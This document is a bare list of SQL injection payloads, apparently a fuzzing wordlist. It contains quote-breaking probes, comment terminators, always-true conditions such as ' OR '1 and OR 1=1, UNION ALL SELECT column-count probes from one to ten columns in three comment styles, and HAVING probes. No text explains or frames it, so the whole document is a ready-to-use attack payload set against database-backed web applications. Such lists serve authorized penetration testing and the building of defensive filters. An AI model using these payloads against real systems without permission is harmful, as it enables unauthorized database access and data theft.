' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1#
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1-- 
UNION ALL SELECT 1,2-- 
UNION ALL SELECT 1,2,3-- 
UNION ALL SELECT 1,2,3,4-- 
UNION ALL SELECT 1,2,3,4,5-- 
UNION ALL SELECT 1,2,3,4,5,6-- 
UNION ALL SELECT 1,2,3,4,5,6,7-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- 
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1-- 
OR 1=0-- 
OR x=x-- 
OR x=y-- 
HAVING 1=1
HAVING 1=0